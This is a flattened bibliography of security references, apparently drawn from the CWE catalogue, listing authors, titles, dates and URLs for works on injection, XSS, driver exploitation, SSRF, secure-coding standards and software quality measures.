+ http://projects.webappsec.org/w/page/13247002/XML%20Entity%20Expansion + 2023-04-07 + + + Elliotte Rusty Harold + Tip: Configure SAX parsers for secure processing + 2005 + --05 + ---27 + https://web.archive.org/web/20101005080451/http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html + 2023-04-07 + + + Blaise Doughan + Preventing Entity Expansion Attacks in JAXB + 2011 + --03 + ---11 + http://blog.bdoughan.com/2011/03/preventing-entity-expansion-attacks-in.html + 2023-04-07 + + + Pascal Meunier + Meta-Character Vulnerabilities + 2008 + --02 + ---20 + https://web.archive.org/web/20100714032622/https://www.cs.purdue.edu/homes/cs390s/slides/week09.pdf + 2023-04-07 + + + Robert Auger + OS Commanding + 2009 + --06 + http://projects.webappsec.org/w/page/13246950/OS%20Commanding + 2023-04-07 + + + Lincoln Stein + John Stewart + The World Wide Web Security FAQ + 2002 + --02 + ---04 + https://www.w3.org/Security/Faq/wwwsf4.html + 2023-04-07 + + + Jordan Dimov, Cigital + Security Issues in Perl Scripts + https://www.cgisecurity.com/lib/sips.html + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 9 - OS Command Injection + 2010 + --02 + ---24 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-9-os-command-injection/ + 2023-04-07 + + + Ronald L. Rivest + Burt Kaliski + RSA Problem + 2003 + --12 + ---10 + http://people.csail.mit.edu/rivest/RivestKaliski-RSAProblem.pdf + + + Optimal Asymmetric Encryption Padding + 2009 + --07 + ---08 + Wikipedia + https://en.wikipedia.org/wiki/Optimal_asymmetric_encryption_padding + 2023-04-07 + + + Ruben Santamarta + Exploiting Common Flaws in Drivers + 2007 + --07 + ---11 + http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1 + + + Yuriy Bulygin + Remote and Local Exploitation of Network Drivers + 2007 + --08 + ---01 + https://www.blackhat.com/presentations/bh-usa-07/Bulygin/Presentation/bh-usa-07-bulygin.pdf + + + Anibal Sacco + Windows driver vulnerabilities: the METHOD_NEITHER odyssey + 2008 + --10 + http://www.net-security.org/dl/insecure/INSECURE-Mag-18.pdf + + + Microsoft + Buffer Descriptions for I/O Control Codes + https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/buffer-descriptions-for-i-o-control-codes + 2023-04-07 + + + Microsoft + Using Neither Buffered Nor Direct I/O + https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/using-neither-buffered-nor-direct-i-o + 2023-04-07 + + + Microsoft + Securing Device Objects + https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/controlling-device-access + 2023-04-07 + + + Piotr Bania + Exploiting Windows Device Drivers + https://www.piotrbania.com/all/articles/ewdd.pdf + 2023-04-07 + + + CERT + EXP00-C. Use parentheses for precedence of operation + https://www.securecoding.cert.org/confluence/display/seccode/EXP00-C.+Use+parentheses+for+precedence+of+operation + + + Steve Christey + Unforgivable Vulnerabilities + 2007 + --08 + ---02 + http://cve.mitre.org/docs/docs-2007/unforgivable.pdf + + + Jeremiah Grossman + Robert "RSnake" Hansen + Petko "pdp" D. Petkov + Anton Rager + Seth Fogie + XSS Attacks + 2007 + Syngress + + + Cross-site scripting + 2008 + --08 + ---26 + Wikipedia + https://en.wikipedia.org/wiki/Cross-site_scripting + 2023-04-07 + + + RSnake + XSS (Cross Site Scripting) Cheat Sheet + http://ha.ckers.org/xss.html + + + Microsoft + Mitigating Cross-site Scripting With HTTP-only Cookies + https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN + 2023-04-07 + + + Mark Curphey, Microsoft + Anti-XSS 3.0 Beta and CAT.NET Community Technology Preview now Live! + https://learn.microsoft.com/en-us/archive/blogs/cisg/anti-xss-3-0-beta-and-cat-net-community-technology-preview-now-live + 2023-04-07 + + + Ivan Ristic + XSS Defense HOWTO + https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/xss-defense-howto/ + 2023-04-07 + + + OWASP + Web Application Firewall + http://www.owasp.org/index.php/Web_Application_Firewall + + + Web Application Security Consortium + Web Application Firewall Evaluation Criteria + http://projects.webappsec.org/w/page/13246985/Web%20Application%20Firewall%20Evaluation%20Criteria + 2023-04-07 + + + RSnake + Firefox Implements httpOnly And is Vulnerable to XMLHTTPRequest + 2007 + --07 + ---19 + + + XMLHttpRequest allows reading HTTPOnly cookies + Mozilla + https://bugzilla.mozilla.org/show_bug.cgi?id=380418 + + + Apache Wicket + http://wicket.apache.org/ + + + OWASP + XSS (Cross Site Scripting) Prevention Cheat Sheet + http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet + + + OWASP + DOM based XSS Prevention Cheat Sheet + http://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet + + + Jason Lam + Top 25 series - Rank 1 - Cross Site Scripting + 2010 + --02 + ---22 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-1-cross-site-scripting/ + 2023-04-07 + + + Johannes Ullrich + Top 25 Series - Rank 11 - Hardcoded Credentials + 2010 + --03 + ---10 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-11-hardcoded-credentials/ + 2023-04-07 + + + Web Application Security Consortium + Insufficient Anti-automation + http://projects.webappsec.org/Insufficient+Anti-automation + + + 2010 CWE/SANS Top 25 Most Dangerous Software Errors + 2010 + --02 + ---04 + http://cwe.mitre.org/top25/archive/2010/2010_cwe_sans_top25.html + + + Jason Lam + Top 25 Series - Rank 12 - Buffer Access with Incorrect Length Value + 2010 + --03 + ---11 + SANS Software Security Institute + https://web.archive.org/web/20100316043717/http://blogs.sans.org:80/appsecstreetfighter/2010/03/11/top-25-series-rank-12-buffer-access-with-incorrect-length-value/ + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 6 - Reliance on Untrusted Inputs in a Security Decision + 2010 + --03 + ---05 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-6-reliance-on-untrusted-inputs-in-a-security-decision/ + 2023-04-07 + + + Scott Mitchell + Understanding ASP.NET View State + 2004 + --05 + ---15 + Microsoft + https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/ms972976(v=msdn.10)?redirectedfrom=MSDN + 2023-04-07 + + + Top 10 2010 + 2010 + --04 + ---19 + OWASP + https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2010 + + + OWASP + Top 10 2010-A1-Injection + http://www.owasp.org/index.php/Top_10_2010-A1-Injection + + + OWASP + Top 10 2010-A2-Cross-Site Scripting (XSS) + http://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_%28XSS%29 + + + OWASP + Top 10 2010-A3-Broken Authentication and Session Management + http://www.owasp.org/index.php/Top_10_2010-A3-Broken_Authentication_and_Session_Management + + + OWASP + Top 10 2010-A4-Insecure Direct Object References + http://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References + + + OWASP + Top 10 2010-A5-Cross-Site Request Forgery (CSRF) + http://www.owasp.org/index.php/Top_10_2010-A5-Cross-Site_Request_Forgery_%28CSRF%29 + + + OWASP + Top 10 2010-A6-Security Misconfiguration + http://www.owasp.org/index.php/Top_10_2010-A6-Security_Misconfiguration + + + OWASP + Top 10 2010-A7-Insecure Cryptographic Storage + http://www.owasp.org/index.php/Top_10_2010-A7-Insecure_Cryptographic_Storage + + + OWASP + Top 10 2010-A8-Failure to Restrict URL Access + http://www.owasp.org/index.php/Top_10_2010-A8-Failure_to_Restrict_URL_Access + + + OWASP + Top 10 2010-A9-Insufficient Transport Layer Protection + http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection + + + OWASP + Top 10 2010-A10-Unvalidated Redirects and Forwards + http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards + + + Daniel Kulp + Apache CXF Security Advisory (CVE-2010-2076) + 2010 + --06 + ---16 + http://svn.apache.org/repos/asf/cxf/trunk/security/CVE-2010-2076.pdf + + + Jeremiah Grossman + Third-Party Web Widget Security FAQ + https://blog.jeremiahgrossman.com/2010/07/third-party-web-widget-security-faq.html + 2023-04-07 + + + Robert C. Seacord + Secure Coding in C and C++ + 2006 + Addison Wesley + + + Jim Manico + Injection-safe templating languages + 2010 + --06 + ---30 + https://manicode.blogspot.com/2010/06/injection-safe-templating-languages_30.html + 2023-04-07 + + + Dinis Cruz + Can we please stop saying that XSS is boring and easy to fix! + 2010 + --09 + ---25 + http://diniscruz.blogspot.com/2010/09/can-we-please-stop-saying-that-xss-is.html + + + Ivan Ristic + Canoe: XSS prevention via context-aware output encoding + 2010 + --09 + ---24 + https://blog.ivanristic.com/2010/09/introducing-canoe-context-aware-output-encoding-for-xss-prevention.html + 2023-04-07 + + + Jim Manico + What is the Future of Automated XSS Defense Tools? + 2011 + --03 + ---08 + http://software-security.sans.org/downloads/appsec-2011-files/manico-appsec-future-tools.pdf + + + Jeremiah Grossman + Business Logic Flaws and Yahoo Games + 2006 + --12 + ---08 + https://blog.jeremiahgrossman.com/2006/12/business-logic-flaws.html + 2023-04-07 + + + Jeremiah Grossman + Seven Business Logic Flaws That Put Your Website At Risk + 2007 + --10 + https://docplayer.net/10021793-Seven-business-logic-flaws-that-put-your-website-at-risk.html + 2023-04-07 + + + WhiteHat Security + Business Logic Flaws + https://web.archive.org/web/20080720171327/http://www.whitehatsec.com/home/solutions/BL_auction.html + 2023-04-07 + + + WASC + Abuse of Functionality + http://projects.webappsec.org/w/page/13246913/Abuse-of-Functionality + + + Rafal Los + Prajakta Jagdale + Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic + 2011 + https://www.slideshare.net/RafalLos/defying-logic-business-logic-testing-with-automation + 2023-04-07 + + + Viktoria Felmetsger + Ludovico Cavedon + Christopher Kruegel + Giovanni Vigna + Toward Automated Detection of Logic Vulnerabilities in Web Applications + USENIX Security Symposium 2010 + 2010 + --08 + https://www.usenix.org/legacy/events/sec10/tech/full_papers/Felmetsger.pdf + 2023-04-07 + + + Faisal Nabi + Designing a Framework Method for Secure Business Application Logic Integrity in e-Commerce Systems + International Journal of Network Security, Vol.12, No.1 + 2011 + http://ijns.femto.com.tw/contents/ijns-v12-n1/ijns-2011-v12-n1-p29-41.pdf + + + WASC + Insufficient Process Validation + http://projects.webappsec.org/w/page/13246943/Insufficient-Process-Validation + + + Mark Dowd + Ryan Smith + David Dewey + Attacking Interoperability + 2009 + http://hustlelabs.com/stuff/bh2009_dowd_smith_dewey.pdf + 2023-04-07 + + + Fred Long + Dhruv Mohindra + Robert C. Seacord + Dean F. Sutherland + David Svoboda + The CERT Oracle Coding Standard for Java + 1st Edition + 2011 + --09 + ---18 + Addison-Wesley Professional + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 00. Input Validation and Data Sanitization (IDS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487865 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 01. Declarations and Initialization (DCL) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487858 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 02. Expressions (EXP) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487704 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 03. Numeric Types and Operations (NUM) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487628 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 05. Object Orientation (OBJ) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487715 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 06. Methods (MET) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487441 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 07. Exceptional Behavior (ERR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487665 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 08. Visibility and Atomicity (VNA) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487824 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 09. Locking (LCK) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487666 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 10. Thread APIs (THI) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487735 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 11. Thread Pools (TPS) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487728 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 12. Thread-Safety Miscellaneous (TSM) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487731 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 13. Input Output (FIO) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487725 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 14. Serialization (SER) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487787 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 15. Platform Security (SEC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487683 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 16. Runtime Environment (ENV) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487764 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 49. Miscellaneous (MSC) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487686 + + + 2011 CWE/SANS Top 25 Most Dangerous Software Errors + 2011 + --06 + ---27 + http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.html + + + The Software Engineering Institute + SEI CERT C++ Coding Standard + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682 + + + The Software Engineering Institute + 01. Preprocessor (PRE) + https://www.securecoding.cert.org/confluence/display/cplusplus/01.+Preprocessor+%28PRE%29 + + + CERT + 02. Declarations and Initialization (DCL) + https://www.securecoding.cert.org/confluence/display/cplusplus/02.+Declarations+and+Initialization+%28DCL%29 + + + CERT + 03. Expressions (EXP) + https://www.securecoding.cert.org/confluence/display/cplusplus/03.+Expressions+%28EXP%29 + + + CERT + 04. Integers (INT) + https://www.securecoding.cert.org/confluence/display/cplusplus/04.+Integers+%28INT%29 + + + CERT + 05. Floating Point Arithmetic (FLP) + https://www.securecoding.cert.org/confluence/display/cplusplus/05.+Floating+Point+Arithmetic+%28FLP%29 + + + CERT + 06. Arrays and the STL (ARR) + https://www.securecoding.cert.org/confluence/display/cplusplus/06.+Arrays+and+the+STL+%28ARR%29 + + + CERT + 07. Characters and Strings (STR) + https://www.securecoding.cert.org/confluence/display/cplusplus/07.+Characters+and+Strings+%28STR%29 + + + CERT + 08. Memory Management (MEM) + https://www.securecoding.cert.org/confluence/display/cplusplus/08.+Memory+Management+%28MEM%29 + + + CERT + 09. Input Output (FIO) + https://www.securecoding.cert.org/confluence/display/cplusplus/09.+Input+Output+%28FIO%29 + + + CERT + 10. Environment (ENV) + https://www.securecoding.cert.org/confluence/display/cplusplus/10.+Environment+%28ENV%29 + + + CERT + 11. Signals (SIG) + https://www.securecoding.cert.org/confluence/display/cplusplus/11.+Signals+%28SIG%29 + + + Steven Christey + Argument injection issues + https://seclists.org/bugtraq/2007/Feb/234ed + 2023-04-07 + + + CERT + 12. Exceptions and Error Handling (ERR) + https://www.securecoding.cert.org/confluence/display/cplusplus/12.+Exceptions+and+Error+Handling+%28ERR%29 + + + CERT + 13. Object Oriented Programming (OOP) + https://www.securecoding.cert.org/confluence/display/cplusplus/13.+Object+Oriented+Programming+%28OOP%29 + + + CERT + 14. Concurrency (CON) + https://www.securecoding.cert.org/confluence/display/cplusplus/14.+Concurrency+%28CON%29 + + + CERT + 49. Miscellaneous (MSC) + https://www.securecoding.cert.org/confluence/display/cplusplus/49.+Miscellaneous+%28MSC%29 + + + OWASP + SQL Injection Prevention Cheat Sheet + http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet + + + Steven Friedl + SQL Injection Attacks by Example + 2007 + --10 + ---10 + http://www.unixwiz.net/techtips/sql-injection.html + + + Ferruh Mavituna + SQL Injection Cheat Sheet + 2007 + --03 + ---15 + https://web.archive.org/web/20080126180244/http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ + 2023-04-07 + + + David Litchfield + Chris Anley + John Heasman + Bill Grindlay + The Database Hacker's Handbook: Defending Database Servers + 2005 + --07 + ---14 + Wiley + + + David Litchfield + The Oracle Hacker's Handbook: Hacking and Defending Oracle + 2007 + --01 + ---30 + Wiley + + + Microsoft + SQL Injection + 2008 + --12 + https://learn.microsoft.com/en-us/previous-versions/sql/sql-server-2008-r2/ms161953(v=sql.105)?redirectedfrom=MSDN + 2023-04-07 + + + Microsoft Security Vulnerability Research & Defense + SQL Injection Attack + https://msrc.microsoft.com/blog/2008/05/sql-injection-attack/ + 2023-04-07 + + + Michael Howard + Giving SQL Injection the Respect it Deserves + 2008 + --05 + ---15 + https://learn.microsoft.com/en-us/archive/blogs/michael_howard/giving-sql-injection-the-respect-it-deserves + 2023-04-07 + + + Frank Kim + Top 25 Series - Rank 2 - SQL Injection + 2010 + --03 + ---01 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-2-sql-injection/ + 2023-04-07 + + + SPI Dynamics + Web Applications and LDAP Injection + + + Amit Klein + Blind XPath Injection + 2004 + --05 + ---19 + https://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf + 2023-04-07 + + + Mateusz "j00ru" Jurczyk + Windows Kernel Reference Count Vulnerabilities - Case Study + 2012 + --11 + https://j00ru.vexillium.org/slides/2012/zeronights.pdf + 2023-04-07 + + + Stefan Esser + Shocking News in PHP Exploitation + 2009 + https://owasp.org/www-pdf-archive/POC2009-ShockingNewsInPHPExploitation.pdf + 2023-04-07 + + + Dinis Cruz + "Two Security Vulnerabilities in the Spring Framework's MVC" pdf (from 2008) + http://diniscruz.blogspot.com/2011/07/two-security-vulnerabilities-in-spring.html + 2023-04-07 + + + Ryan Berg + Dinis Cruz + Two Security Vulnerabilities in the Spring Framework's MVC + https://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf + 2023-04-07 + + + ASPNETUE + Best Practices for ASP.NET MVC + 2010 + --09 + ---17 + https://web.archive.org/web/20100921074010/http://blogs.msdn.com/b/aspnetue/archive/2010/09/17/second_2d00_post.aspx + 2023-04-07 + + + Michael Hartl + Mass assignment in Rails applications + 2008 + --09 + ---21 + https://web.archive.org/web/20090808163156/http://blog.mhartl.com/2008/09/21/mass-assignment-in-rails-applications/ + 2023-04-07 + + + Tobi + Secure your Rails apps! + 2012 + --03 + ---06 + https://pragtob.wordpress.com/2012/03/06/secure-your-rails-apps/ + 2023-04-07 + + + Heiko Webers + Ruby On Rails Security Guide + https://guides.rubyonrails.org/security.html#mass-assignment + 2023-04-07 + + + Josh Bush + Mass Assignment Vulnerability in ASP.NET MVC + 2012 + --03 + ---05 + https://web.archive.org/web/20120309022539/http://freshbrewedcode.com/joshbush/2012/03/05/mass-assignment-aspnet-mvc + 2023-04-07 + + + K. Scott Allen + 6 Ways To Avoid Mass Assignment in ASP.NET MVC + 2012 + --03 + ---12 + https://odetocode.com/blogs/scott/archive/2012/03/11/complete-guide-to-mass-assignment-in-asp-net-mvc.aspx + 2023-04-07 + + + Egidio Romano + PHP Object Injection + 2013 + --01 + ---22 + https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection + 2023-04-07 + + + Solar Designer + Password hashing at scale + 2012 + --10 + ---01 + https://www.openwall.com/presentations/YaC2012-Password-Hashing-At-Scale/ + 2023-04-07 + + + Solar Designer + New developments in password hashing: ROM-port-hard functions + 2012 + --11 + https://www.openwall.com/presentations/ZeroNights2012-New-In-Password-Hashing/ + 2023-04-07 + + + Stefano Di Paola + Arshan Dabirsiaghi + Expression Language Injection + 2011 + --09 + ---12 + https://mindedsecurity.com/wp-content/uploads/2020/10/ExpressionLanguageInjection.pdf + 2023-04-07 + + + Dan Amodio + Remote Code with Expression Language Injection + 2012 + --12 + ---14 + http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/ + 2023-04-07 + + + Alexander Polyakov + Dmitry Chastukhin + SSRF vs. Business-critical applications: XXE tunneling in SAP + 2012 + --07 + ---26 + https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf + + + Alexander Polyakov + Dmitry Chastukhin + Alexey Tyurin + SSRF vs. Business-critical Applications. Part 1: XXE Tunnelling in SAP NetWeaver + http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf + + + Riyaz Ahemed Walikar + Cross Site Port Attacks - XSPA - Part 1 + 2012 + --11 + ---07 + https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-1/ + + + Riyaz Ahemed Walikar + Cross Site Port Attacks - XSPA - Part 2 + 2012 + --11 + ---13 + https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-2/ + + + Riyaz Ahemed Walikar + Cross Site Port Attacks - XSPA - Part 3 + 2012 + --11 + ---14 + https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-3/ + + + Vladimir Vorontsov + Alexander Golovko + SSRF attacks and sockets: smorgasbord of vulnerabilities + https://www.slideshare.net/DefconRussia/vorontsov-golovko-ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities + 2023-04-07 + + + ONsec Lab + SSRF bible. Cheatsheet + 2013 + --01 + ---26 + https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit?pli=1# + + + Deral Heiland + Web Portals: Gateway To Information, Or A Hole In Our Perimeter Defenses + 2008 + --02 + http://www.shmoocon.org/2008/presentations/Web%20portals,%20gateway%20to%20information.ppt + + + Android Open Source Project + Security Tips + 2013 + --07 + ---16 + https://developer.android.com/training/articles/security-tips.html#StoringData + 2023-04-07 + + + Erika Chin + Adrienne Porter Felt + Kate Greenwood + David Wagner + Analyzing Inter-Application Communication in Android + http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf + + + Android Open Source Project + Security Tips + 2013 + --07 + ---16 + https://developer.android.com/training/articles/security-tips#ContentProviders + 2023-04-07 + + + Top 10 2013 + 2013 + --06 + ---12 + OWASP + https://www.owasp.org/index.php/Top_10_2013 + + + OWASP + Top 10 2013-A1-Injection + https://www.owasp.org/index.php/Top_10_2013-A1-Injection + + + Ulf Harnhammar + CRLF Injection + Bugtraq + 2002 + --05 + ---07 + http://marc.info/?l=bugtraq&m=102088154213630&w=2 + + + OWASP + Top 10 2013-A2-Broken Authentication and Session Management + https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management + + + OWASP + Top 10 2013-A3-Cross-Site Scripting (XSS) + https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_%28XSS%29 + + + OWASP + Top 10 2013-A4-Insecure Direct Object References + https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References + + + OWASP + Top 10 2013-A5-Security Misconfiguration + https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration + + + OWASP + Top 10 2013-A6-Sensitive Data Exposure + https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure + + + OWASP + Top 10 2013-A7-Missing Function Level Access Control + https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control + + + OWASP + Top 10 2013-A8-Cross-Site Request Forgery (CSRF) + https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_%28CSRF%29 + + + OWASP + Top 10 2013-A9-Using Components with Known Vulnerabilities + https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities + + + OWASP + Top 10 2013-A10-Unvalidated Redirects and Forwards + https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards + + + Guillaume Ross + Scheming for Privacy and Security + 2013 + --11 + ---11 + https://brooksreview.net/2013/11/guest-post_scheming-for-privacy-and-security/ + 2023-04-07 + + + US-CERT + UDP-based Amplification Attacks + 2014 + --01 + ---17 + https://www.us-cert.gov/ncas/alerts/TA14-017A + + + Fortify + Android Bad Practices: Sticky Broadcast + https://www.hpe.com/us/en/solutions/infrastructure-security.html?jumpid=va_wnmstr1ug6_aid-510326901 + 2023-04-07 + + + Apurva Udaykumar + Setting a crossdomain.xml file for HTTP streaming + 2012 + --11 + ---19 + Adobe + https://web.archive.org/web/20121124184922/http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html + 2023-04-07 + + + Adobe + Cross-domain policy for Flash movies + Adobe + http://kb2.adobe.com/cps/142/tn_14213.html + + + Microsoft Corporation + HTTP Communication and Security with Silverlight + https://learn.microsoft.com/en-us/previous-versions/windows/silverlight/dotnet-windows-silverlight/cc838250(v=vs.95)?redirectedfrom=MSDN + 2023-04-07 + + + Microsoft Corporation + Network Security Access Restrictions in Silverlight + https://learn.microsoft.com/en-us/previous-versions/windows/silverlight/dotnet-windows-silverlight/cc645032(v=vs.95) + 2023-04-07 + + + Dongseok Jang + Aishwarya Venkataraman + G. Michael Sawka + Hovav Shacham + Analyzing the Crossdomain Policies of Flash Applications + 2011 + --05 + http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf + + + Shaun Clowes + A Study in Scarlet + https://www.cgisecurity.com/lib/studyinscarlet.txt + 2023-04-07 + + + Stefan Esser + Suhosin + http://www.hardened-php.net/suhosin/ + + + Johannes Ullrich + Top 25 Series - Rank 13 - PHP File Inclusion + 2010 + --03 + ---11 + SANS Software Security Institute + https://www.sans.org/blog/top-25-series-rank-13-php-file-inclusion/ + 2023-04-07 + + + Mozilla MDN + Equality comparisons and sameness + https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness + 2017-11-17 + + + Chris McMahon Stone + Tom Chothia + Flavio D. Garcia + Spinner: Semi-Automatic Detection of Pinning without Hostname Verification + http://www.cs.bham.ac.uk/~garciaf/publications/spinner.pdf + 2018-01-16 + + + Wikipedia + Samy (computer worm) + https://en.wikipedia.org/wiki/Samy_(computer_worm) + 2018-01-16 + + + Top 10 2017 + 2017 + --04 + ---12 + OWASP + https://owasp.org/www-pdf-archive/OWASP_Top_10-2017_%28en%29.pdf.pdf + + + Mathias Bynens + About rel=noopener + 2016 + --03 + ---15 + https://mathiasbynens.github.io/rel-noopener/ + + + Object Management Group (OMG) + Automated Source Code Performance Efficiency Measure (ASCPEM) + 2016 + --01 + https://www.omg.org/spec/ASCPEM/ + 2023-04-07 + + + Object Management Group (OMG) + Automated Source Code Maintainability Measure (ASCMM) + 2016 + --01 + https://www.omg.org/spec/ASCMM/ + 2023-04-07 + + + Object Management Group (OMG) + Automated Source Code Reliability Measure (ASCRM) + 2016 + --01 + http://www.omg.org/spec/ASCRM/1.0/ + + + Object Management Group (OMG) + Automated Source Code Security Measure (ASCSM) + 2016 + --01 + http://www.omg.org/spec/ASCSM/1.0/ + + + Robert A. Martin + Lawrence H. Shafer + Providing a Framework for Effective Software Quality Assessment + 1996 + --07 + https://www.researchgate.net/publication/285403022_PROVIDING_A_FRAMEWORK_FOR_EFFECTIVE_SOFTWARE_QUALITY_MEASUREMENT_MAKING_A_SCIENCE_OF_RISK_ASSESSMENT + 2023-04-07 + + + Wikipedia + Cyclomatic Complexity + 2018 + --04 + ---13 + https://en.wikipedia.org/wiki/Cyclomatic_complexity + + + Wikipedia + Halstead complexity measures + 2017 + --11 + ---22 + https://en.wikipedia.org/wiki/Halstead_complexity_measures + + + Pratyusa Manadhata + An Attack Surface Metric + 2008 + --11 + http://reports-archive.adm.cs.cmu.edu/anon/2008/CMU-CS-08-152.pdf + + + Pratyusa Manadhata + Jeannette M. Wing + Measuring a System's Attack Surface + 2004 + http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/ManadhataWing04.pdf + + + Consortium for Information & Software Quality (CISQ) + Automated Quality Characteristic Measures + 2016 + http://it-cisq.org/standards/automated-quality-characteristic-measures/ + + + Wikipedia + Encapsulation (computer programming) + https://en.wikipedia.org/wiki/Encapsulation_(computer_programming) + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java + https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 04. Characters and Strings (STR) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487607 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 17. Java Native Interface (JNI) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487346 + + + The Software Engineering Institute + SEI CERT Oracle Coding Standard for Java : Rule 50. Android (DRD) + https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487375 + + + Wikipedia + Connection pool + https://en.wikipedia.org/wiki/Connection_pool + + + Bruce Dawson + Comparing Floating Point Numbers, 2012 Edition + 2012 + --02 + ---25 + https://randomascii.wordpress.com/2012/02/25/comparing-floating-point-numbers-2012-edition/ + + + Standard C++ Foundation + Memory Management + https://isocpp.org/wiki/faq/freestore-mgmt#delete-this + + + QuantStart + C++ Virtual Destructors: How to Avoid Memory Leaks + https://www.quantstart.com/articles/C-Virtual-Destructors-How-to-Avoid-Memory-Leaks/ + 2023-04-07 + + + 